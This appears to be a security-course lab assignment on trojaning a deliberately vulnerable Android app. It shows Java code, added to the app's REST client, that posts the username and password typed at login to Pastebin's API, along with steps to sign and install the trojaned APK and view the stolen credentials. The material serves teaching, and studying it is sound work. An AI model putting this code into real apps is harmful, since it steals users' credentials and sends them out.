Project 5x: Trojaning an Android App and Posting Credentials on the Web (15 points)

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project

Purpose

We'll take an Android app and modify it to steal passwords.

I will post the stolen passwords on the Internet, which is a lot scarier than just logging lt locally.

Pastebin

Go to

http://pastebin.com/

At the top right, click "sign up".

Fill in the form. You can use mailinator.com if you wish.

Open the email you used and click on a link to activate your Pastebin account.

At the top right of Pastebin, click api.

Find your Developer API Key, as shown below.

Use Java

In the previous project, we edited the smali code itself. That's a powerful technique, but the first step is to edit the Java code which is easier to read.

This technique won't work on closed-source projects, of course, because you don't have access to the Java code.

Follow the Previous Trojaning Project

The previous project should get you to the point where you have the "EMM - Vulnerable" app loaded into Android Studio.

Open the RestClient.smali file, as shown below.

Developing Trojan Code

As you can see, this module is already sending the username and password to the login service, so we can copy the code that does that and make it into a Trojan.

Adding the Trojan Code

Here's how I did it:
// START OF EVIL TROJAN CODE
String pasteurl = "http://pastebin.com/api/api_post.php";
Map<String, String> parameters_trojan = new HashMap<String, String>();
parameters_trojan.put("api_dev_key", "09deadbeefdeadbeefdeadbeefcafee1");
parameters_trojan.put("api_option", "paste");
String Pastedata = "Android keylogger trojan for samsclass from YOURNAME ";
parameters_trojan.put("api_paste_code", Pastedata + username + ":" + password);
JsonResponse = postHttpContent(pasteurl, parameters_trojan);
// END OF EVIL TROJAN CODE

Build and Sign the APK File

In Android Studio, click Build, "Create Signed APK...".

Follow the steps on your screen to build and sign the project.

You should see the message "Signed APK's generated successfully", as shown below.

Saving a Screen Image

Make sure these items are visible: Save a full-desktop image of this screen. On a Mac, press Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the image with the filename "YOUR NAME Proj 5xa", replacing "YOUR NAME" with your real name.

Stealing Passwords

Install the app on a real or emulated Android device.

Attempt a login with these credentials:

You won't be able to log in, but the password will be stolen and sent to Pastebin anyway.

Viewing Recent Pastes

In a Web browser, go to

http://pastebin.com/

On the right side, click "Public Pastes, as shown below.

A list of recent pastes appears, as shown below.

Find the paste with your name on it and click it. You should see your stolen username and password, as shown below.

Troubleshooting

If you can't find your paste, capture the network traffic with Wireshark. The "200 OK" reply packet contains the URL to your paste, as shown below.

Saving a Screen Image

Make sure these Pastebin post with stolen credentials showing your name is visible:

Save a full-desktop image of this screen. On a Mac, press Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the image with the filename "YOUR NAME Proj 5xb", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the images to cnit.128sam@gmail.com with the subject line: Proj 5x from YOUR NAME
Last modified 4-28-15 3 pm